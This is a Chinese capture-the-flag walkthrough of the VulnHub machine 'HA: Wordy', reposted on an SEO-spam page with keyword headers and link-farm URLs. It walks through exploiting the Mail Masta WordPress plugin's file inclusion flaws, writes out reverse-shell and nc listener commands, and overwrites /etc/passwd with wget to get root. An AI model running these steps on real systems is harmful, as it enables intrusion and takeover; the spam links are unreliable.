当前位置: 首页 > wzjs >正文

凡科做网站技巧天津培训网站建设

凡科做网站技巧,天津培训网站建设,智慧企业管理平台,杭州婚恋网站建设HA: Wordy 来自 <HA: Wordy ~ VulnHub> 1&#xff0c;将两台虚拟机网络连接都改为NAT模式 2&#xff0c;攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.128&#xff0c;靶场IP192.168.23.130 3&#xff0c;对靶机进行端口服务探…

HA: Wordy

来自 <HA: Wordy ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.130

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.130

4,这个网站是一个默认页面

dirsearch -u http://192.168.23.130/ -x 403,404

网站应该是一个wordpress建站系统

查看网站安装的插件

检索这个插件存在的漏洞

searchsploit mail masta

然后查看漏洞利用方法

searchsploit -m 40290.txt

cat 40290.txt

http://192.168.23.130/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

漏洞利用成功,尝试污染日志文件,然后通过文件包含漏洞getshell。

5,第二种方法,测试是否存在远程文件包含漏洞

http://192.168.23.130/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=https://www.baidu.com

存在,那么就可以通过远程文件包含漏洞进行写马操作,使用kali自带的木马

cp /usr/share/webshells/php/php-reverse-shell.php .

mv php-reverse-shell.php shell.php

vim shell.php

注意修改反弹shell的IP和端口

python -m http.server

http://192.168.23.130/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.23.128:8000/shell.php

与此同时需要打开对4444端口的监听

nc -lvvp 4444

成功getshell

6,使用python脚本启动一个交互式shell,没有python这个命令

查看一下怎么提权

sudo -l

find /  -type f -perm -u=s -user root 2>/dev/null

使用wget -O 提权,利用wget -O命令覆盖/etc/passwd文件

在kali上创建文本文件,取名passwd,并将靶机/etc/passwd文件的内容复制进去。因为之后要覆盖靶机的/etc/passwd,所以名字要一模一样

vim passwd

openssl passwd -1 123456

cat passwd

然后再开启一个

python -m http.server

cd /tmp

wget http://192.168.23.128:8000/passwd

cp passwd /etc/passwd

python3 -c 'import pty;pty.spawn("/bin/bash")'

su


文章转载自:

http://P85oIqM0.cyLbs.cn
http://Z73OezD5.cyLbs.cn
http://LX4RW5nZ.cyLbs.cn
http://UeuH7b5Z.cyLbs.cn
http://iCc5wssd.cyLbs.cn
http://Te4yhaTt.cyLbs.cn
http://SPBQK8tm.cyLbs.cn
http://WOlMCtLH.cyLbs.cn
http://uQXmdWOU.cyLbs.cn
http://76ADHh8j.cyLbs.cn
http://FOs43479.cyLbs.cn
http://KTTYUIcM.cyLbs.cn
http://AmLYHnRC.cyLbs.cn
http://YnQKI3F7.cyLbs.cn
http://bIuDtGvg.cyLbs.cn
http://5aKLfpKG.cyLbs.cn
http://0yZ8dzYR.cyLbs.cn
http://akK5M8sw.cyLbs.cn
http://jwdQMHjF.cyLbs.cn
http://VcLaAvZ2.cyLbs.cn
http://NQRsRl7S.cyLbs.cn
http://BtKC8G0y.cyLbs.cn
http://GliQB3eu.cyLbs.cn
http://XWxksutH.cyLbs.cn
http://TvNDY8mH.cyLbs.cn
http://Y8Lu6LaV.cyLbs.cn
http://rJlE2JwZ.cyLbs.cn
http://fDSdNaUH.cyLbs.cn
http://HcXgT2YO.cyLbs.cn
http://9XCfgy2R.cyLbs.cn
http://www.dtcms.com/wzjs/629553.html

相关文章:

  • 巴中建网站的公司wordpress首页文章分类
  • 东莞大朗网站设计在哪个网站可以做酒店预定单
  • 网网站开发如何进行网页设计和网站制作
  • 最好的设计师网站好玩的网游
  • 用php做购物网站视频wordpress rss 图片
  • 网站编辑步骤有哪些全椒县城乡规划建设局网站
  • 个人网站 备案 名称有口碑的坪山网站建设
  • 网站开发的内容我想做个门户网站怎么做
  • 个人备案的网站内容个人备案网站
  • 南乐网站建设甘肃网站建设推广
  • 西安网站建设 白帽网络如何做网络营销
  • 手机端网站优化浙江品牌设计公司
  • 榆中县城乡建设局网站多少钱算网站
  • 免费注册域名的网站wordpress调用文章
  • 深圳微信分销网站制作收录情况有几种
  • 电子商务网站建设汉狮建筑型专业网站有哪些
  • 网站代做发布需求p2p网站如何做推广
  • 电子商务网站开发基础东莞企业网站制作怎么做
  • 珠海免费建站wordpress 最优秀主题
  • 网站建设方案书备案推广排名
  • 青岛网站建设与推广网站的建设需要多少
  • 网站怎么放在服务器上seo排名查询工具
  • 爱站网关键词密度查询自己弄个网站要多少钱
  • 免费素材库大全网站北京网站系统开发
  • 营销者网站国外设计模板网站
  • 哪个网站做脚本收费企业邮箱哪家好
  • 网站索引量暴增粉末涂料 技术支持 东莞网站建设
  • p2p网站开发 源代码裤子seo关键词
  • 利用百度云做网站哪些网站可以做代理
  • 查询网网站有哪些竞价网站